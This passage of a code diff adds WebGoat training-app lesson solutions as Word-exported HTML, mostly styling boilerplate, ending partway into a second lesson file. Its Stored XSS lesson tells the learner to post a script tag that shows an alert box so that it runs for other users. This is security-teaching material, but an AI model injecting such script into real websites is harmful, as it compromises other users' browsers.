+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Perform Stored Cross Site
+Scripting (XSS) <o:p></o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach: <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>It is always a
+good practice to scrub all inputs, especially those inputs that will later be
+used as parameters to OS commands, scripts, and database queries. It is
+particularly important for content that will be permanently stored somewhere.
+Users should not be able to create message content that could cause another
+user to load an undesirable page or undesirable content when the user's message
+is retrieved. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to add message content that cause another user to load an
+undesirable page or content.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1339" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/StoredXSS_files/image007.jpg" v:shapes="Picture_x0020_1339"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 14<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal>Enter this: &lt;script language=”javascript”
+type=”text/javascript”&gt;alert(‘Ha Ha Ha’);&lt;/script&gt; in the message text
+box.</p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1340"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/StoredXSS_files/image008.jpg" v:shapes="Picture_x0020_1340"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Stored message<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1341"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:267.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/StoredXSS_files/image005.png" o:title="" cropbottom="4597f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=357
+src="/WebGoat/lesson_solutions/StoredXSS_files/image009.jpg" v:shapes="Picture_x0020_1341"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 14 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/ThreadSafetyProblem.html b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem.html
new file mode 100644
index 000000000..462df8119
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ThreadSafetyProblem.html
@@ -0,0 +1,670 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>6</o:Revision>
+  <o:TotalTime>7</o:TotalTime>
+  <o:Created>2007-07-11T10:29:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:31:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>261</o:Words>
+  <o:Characters>1491</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>12</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1749</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/ThreadSafetyProblem_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
